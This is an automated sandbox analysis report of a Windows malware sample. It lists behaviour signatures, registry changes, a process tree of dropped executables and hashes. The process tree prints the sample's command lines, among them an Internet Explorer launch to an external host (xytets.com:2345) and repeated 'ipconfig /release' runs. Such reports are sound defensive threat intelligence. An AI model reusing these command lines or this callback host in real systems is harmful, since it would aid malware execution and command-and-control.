Analysis Overview
SHA256
6d131c347e95abc7aedf92773ee5b94593279c62bf02528365544a663bf0826c
Threat Level: Shows suspicious behavior
The file JaffaCakes118_437309d104ca341348f98d56425358fc was found to be: Shows suspicious behavior.
Malicious Activity Summary
Executes dropped EXE
Loads dropped DLL
Unsigned PE
System Location Discovery: System Language Discovery
Suspicious use of FindShellTrayWindow
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Suspicious behavior: LoadsDriver
Suspicious use of AdjustPrivilegeToken
Gathers network information
Modifies Internet Explorer settings
Suspicious behavior: EnumeratesProcesses
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2025-01-27 20:34
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2025-01-27 20:34
Reported
2025-01-27 20:37
Platform
win7-20241010-en
Max time kernel
150s
Max time network
138s
Command Line
Signatures
Executes dropped EXE
Loads dropped DLL
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Temp\rmgeywrljd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Temp\ysnlfdxspk.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Temp\upnhczusmg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Temp\wqojgbvtnl.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Temp\ojgbvtnlgaysqkfd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Temp\caupmhfzur.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Temp\olgeysqlid.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Temp\vsnhfzxsmk.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Temp\axsqkfcxup.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_437309d104ca341348f98d56425358fc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Temp\lgeysqlidx.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Temp\cxrpkhcwuo.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Temp\wupjhbztom.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Temp\nlfaysqkfc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Temp\usmhezxrmj.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Temp\dysqlidxvp.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Temp\trmgeywqlj.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Temp\pkecwupjey.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Temp\wqlidbvqni.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Temp\usmkezwrpj.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Temp\ojhbztolge.exe | N/A |
Gathers network information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\windows\system32\ipconfig.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\IntelliForms | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\LowRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "444171956" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\InternetRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\GPU | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\IETld\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{252E1941-DCEE-11EF-8121-F6D98E36DBEF} = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000023d48ee11fb50b40b431f9f144d107fb00000000020000000000106600000001000020000000c2be43dedc1c740dbfd7d79e0ca519e10a428e60168afb334edbd32bb2c1b68c000000000e8000000002000020000000ad85904af684a0ac4a05d5223b15aa92659a2de538db340b4bc79b6981c8abcc90000000dc10478aa9ef719d8a4f5246d068c2e9b90fa80757af97c66aa32310dd04ba61621f83e981f06bb699beab7ad38871cfa2c751426cd6de1ccb99e3300cd864b2876f19f904d7c184106dae3401b385ba1710dcd3299fb45a1beadfa7be4ed94fe3ffa35648200e2aa5dff3311fc2a653747ea19d84e26a7c1fe233e8ceb52d598d115418ea105adfe5fcacd5c05166c740000000affb68967fa78a71debdeadea2d10ac4522a879080e4c98c512095a4074a4d3428fc4ec4f511f722b83dcbf4cafcbaae5e075c62a80c6f434b70adfe68f791fb | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\DomainSuggestion | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000023d48ee11fb50b40b431f9f144d107fb000000000200000000001066000000010000200000002778afc389a971e62ac9d1793352ec25bba45f86875d5a60268291980440ec52000000000e80000000020000200000007c9293987ed2dbc789a5101332c660cc9283f003b18e359266451779b42f409d200000006b1563f77b3c808b9082ced6487c6cc20dae70a80af71732660ebeb84a78d1e740000000dae63e5b7fdbf2e4496d6a91a5cf28b80a9702f159b8c47697988b2c84ee59f7f77077e98ebe67b38291ce0ed714180cb4673c7a970153549947385bf63dbaab | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Zoom | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = b0af18fdfa70db01 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "2" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\PageSetup | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Toolbar | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\SearchScopes | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Temp\i_pkecwupjey.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Temp\i_lgeysqlidx.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Temp\i_cxrpkhcwuo.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Temp\i_wupjhbztom.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Temp\i_wqojgbvtnl.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Temp\i_nlfaysqkfc.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Temp\i_caupmhfzur.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Temp\i_rmgeywrljd.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Temp\i_olgeysqlid.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Temp\i_vsnhfzxsmk.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Temp\i_usmhezxrmj.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Temp\i_ojhbztolge.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Temp\i_dysqlidxvp.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Temp\i_axsqkfcxup.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Temp\i_usmkezwrpj.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Temp\i_trmgeywqlj.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Temp\i_wqlidbvqni.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Temp\i_ysnlfdxspk.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Temp\i_upnhczusmg.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_437309d104ca341348f98d56425358fc.exe
"C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_437309d104ca341348f98d56425358fc.exe"
C:\Temp\ojgbvtnlgaysqkfd.exe
C:\Temp\ojgbvtnlgaysqkfd.exe run
C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" http://xytets.com:2345/t.asp?os=home
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2176 CREDAT:275457 /prefetch:2
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\Temp\pkecwupjey.exe ups_run
C:\Temp\pkecwupjey.exe
C:\Temp\pkecwupjey.exe ups_run
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release
C:\windows\system32\ipconfig.exe
C:\windows\system32\ipconfig.exe /release
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\Temp\i_pkecwupjey.exe ups_ins
C:\Temp\i_pkecwupjey.exe
C:\Temp\i_pkecwupjey.exe ups_ins
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\Temp\lgeysqlidx.exe ups_run
C:\Temp\lgeysqlidx.exe
C:\Temp\lgeysqlidx.exe ups_run
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release
C:\windows\system32\ipconfig.exe
C:\windows\system32\ipconfig.exe /release
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\Temp\i_lgeysqlidx.exe ups_ins
C:\Temp\i_lgeysqlidx.exe
C:\Temp\i_lgeysqlidx.exe ups_ins
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\Temp\cxrpkhcwuo.exe ups_run
C:\Temp\cxrpkhcwuo.exe
C:\Temp\cxrpkhcwuo.exe ups_run
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release
C:\windows\system32\ipconfig.exe
C:\windows\system32\ipconfig.exe /release
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\Temp\i_cxrpkhcwuo.exe ups_ins
C:\Temp\i_cxrpkhcwuo.exe
C:\Temp\i_cxrpkhcwuo.exe ups_ins
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\Temp\wupjhbztom.exe ups_run
C:\Temp\wupjhbztom.exe
C:\Temp\wupjhbztom.exe ups_run
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release
C:\windows\system32\ipconfig.exe
C:\windows\system32\ipconfig.exe /release
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\Temp\i_wupjhbztom.exe ups_ins
C:\Temp\i_wupjhbztom.exe
C:\Temp\i_wupjhbztom.exe ups_ins
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\Temp\wqojgbvtnl.exe ups_run
C:\Temp\wqojgbvtnl.exe
C:\Temp\wqojgbvtnl.exe ups_run
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release
C:\windows\system32\ipconfig.exe
C:\windows\system32\ipconfig.exe /release
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\Temp\i_wqojgbvtnl.exe ups_ins
C:\Temp\i_wqojgbvtnl.exe
C:\Temp\i_wqojgbvtnl.exe ups_ins
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\Temp\nlfaysqkfc.exe ups_run
C:\Temp\nlfaysqkfc.exe
C:\Temp\nlfaysqkfc.exe ups_run
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release
C:\windows\system32\ipconfig.exe
C:\windows\system32\ipconfig.exe /release
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\Temp\i_nlfaysqkfc.exe ups_ins
C:\Temp\i_nlfaysqkfc.exe
C:\Temp\i_nlfaysqkfc.exe ups_ins
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\Temp\caupmhfzur.exe ups_run
C:\Temp\caupmhfzur.exe
C:\Temp\caupmhfzur.exe ups_run
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release
C:\windows\system32\ipconfig.exe
C:\windows\system32\ipconfig.exe /release
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\Temp\i_caupmhfzur.exe ups_ins
C:\Temp\i_caupmhfzur.exe
C:\Temp\i_caupmhfzur.exe ups_ins
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\Temp\rmgeywrljd.exe ups_run
C:\Temp\rmgeywrljd.exe
C:\Temp\rmgeywrljd.exe ups_run
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release
C:\windows\system32\ipconfig.exe
C:\windows\system32\ipconfig.exe /release
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\Temp\i_rmgeywrljd.exe ups_ins
C:\Temp\i_rmgeywrljd.exe
C:\Temp\i_rmgeywrljd.exe ups_ins
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\Temp\olgeysqlid.exe ups_run
C:\Temp\olgeysqlid.exe
C:\Temp\olgeysqlid.exe ups_run
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release
C:\windows\system32\ipconfig.exe
C:\windows\system32\ipconfig.exe /release
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\Temp\i_olgeysqlid.exe ups_ins
C:\Temp\i_olgeysqlid.exe
C:\Temp\i_olgeysqlid.exe ups_ins
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\Temp\vsnhfzxsmk.exe ups_run
C:\Temp\vsnhfzxsmk.exe
C:\Temp\vsnhfzxsmk.exe ups_run
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release
C:\windows\system32\ipconfig.exe
C:\windows\system32\ipconfig.exe /release
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\Temp\i_vsnhfzxsmk.exe ups_ins
C:\Temp\i_vsnhfzxsmk.exe
C:\Temp\i_vsnhfzxsmk.exe ups_ins
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\Temp\usmhezxrmj.exe ups_run
C:\Temp\usmhezxrmj.exe
C:\Temp\usmhezxrmj.exe ups_run
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release
C:\windows\system32\ipconfig.exe
C:\windows\system32\ipconfig.exe /release
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\Temp\i_usmhezxrmj.exe ups_ins
C:\Temp\i_usmhezxrmj.exe
C:\Temp\i_usmhezxrmj.exe ups_ins
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\Temp\ojhbztolge.exe ups_run
C:\Temp\ojhbztolge.exe
C:\Temp\ojhbztolge.exe ups_run
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release
C:\windows\system32\ipconfig.exe
C:\windows\system32\ipconfig.exe /release
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\Temp\i_ojhbztolge.exe ups_ins
C:\Temp\i_ojhbztolge.exe
C:\Temp\i_ojhbztolge.exe ups_ins
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\Temp\dysqlidxvp.exe ups_run
C:\Temp\dysqlidxvp.exe
C:\Temp\dysqlidxvp.exe ups_run
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release
C:\windows\system32\ipconfig.exe
C:\windows\system32\ipconfig.exe /release
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\Temp\i_dysqlidxvp.exe ups_ins
C:\Temp\i_dysqlidxvp.exe
C:\Temp\i_dysqlidxvp.exe ups_ins
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\Temp\axsqkfcxup.exe ups_run
C:\Temp\axsqkfcxup.exe
C:\Temp\axsqkfcxup.exe ups_run
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release
C:\windows\system32\ipconfig.exe
C:\windows\system32\ipconfig.exe /release
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\Temp\i_axsqkfcxup.exe ups_ins
C:\Temp\i_axsqkfcxup.exe
C:\Temp\i_axsqkfcxup.exe ups_ins
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\Temp\usmkezwrpj.exe ups_run
C:\Temp\usmkezwrpj.exe
C:\Temp\usmkezwrpj.exe ups_run
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release
C:\windows\system32\ipconfig.exe
C:\windows\system32\ipconfig.exe /release
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\Temp\i_usmkezwrpj.exe ups_ins
C:\Temp\i_usmkezwrpj.exe
C:\Temp\i_usmkezwrpj.exe ups_ins
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\Temp\trmgeywqlj.exe ups_run
C:\Temp\trmgeywqlj.exe
C:\Temp\trmgeywqlj.exe ups_run
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release
C:\windows\system32\ipconfig.exe
C:\windows\system32\ipconfig.exe /release
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\Temp\i_trmgeywqlj.exe ups_ins
C:\Temp\i_trmgeywqlj.exe
C:\Temp\i_trmgeywqlj.exe ups_ins
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\Temp\wqlidbvqni.exe ups_run
C:\Temp\wqlidbvqni.exe
C:\Temp\wqlidbvqni.exe ups_run
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release
C:\windows\system32\ipconfig.exe
C:\windows\system32\ipconfig.exe /release
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\Temp\i_wqlidbvqni.exe ups_ins
C:\Temp\i_wqlidbvqni.exe
C:\Temp\i_wqlidbvqni.exe ups_ins
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\Temp\ysnlfdxspk.exe ups_run
C:\Temp\ysnlfdxspk.exe
C:\Temp\ysnlfdxspk.exe ups_run
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release
C:\windows\system32\ipconfig.exe
C:\windows\system32\ipconfig.exe /release
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\Temp\i_ysnlfdxspk.exe ups_ins
C:\Temp\i_ysnlfdxspk.exe
C:\Temp\i_ysnlfdxspk.exe ups_ins
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\Temp\upnhczusmg.exe ups_run
C:\Temp\upnhczusmg.exe
C:\Temp\upnhczusmg.exe ups_run
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release
C:\windows\system32\ipconfig.exe
C:\windows\system32\ipconfig.exe /release
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\Temp\i_upnhczusmg.exe ups_ins
C:\Temp\i_upnhczusmg.exe
C:\Temp\i_upnhczusmg.exe ups_ins
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | xytets.com | udp |
| US | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
| US | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
| US | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
Files
\Temp\ojgbvtnlgaysqkfd.exe
| MD5 | 62d7f84f3f59b5aa4e5699e0229555f6 |
| SHA1 | d831ae491d3a8d1129ef99aebf876412529dd37f |
| SHA256 | 41dd1fb76d353be8b272623269346a9c7b45a8f3fd27916d5334c0f12de6b438 |
| SHA512 | 997ed796611933a51a7b027970ae8c9aa72ae1d18c3ee5bd61459bf3cc030c8ae5299da49c9fe0af45b69f0ff16bb780f39924df11509e1883c53a76685f3093 |
\Temp\CreateProcess.exe
| MD5 | 0dcd3f530356735b5c614568dd52ee57 |
| SHA1 | 6e14c8776aa542004e84e73d04a157249b767dbb |
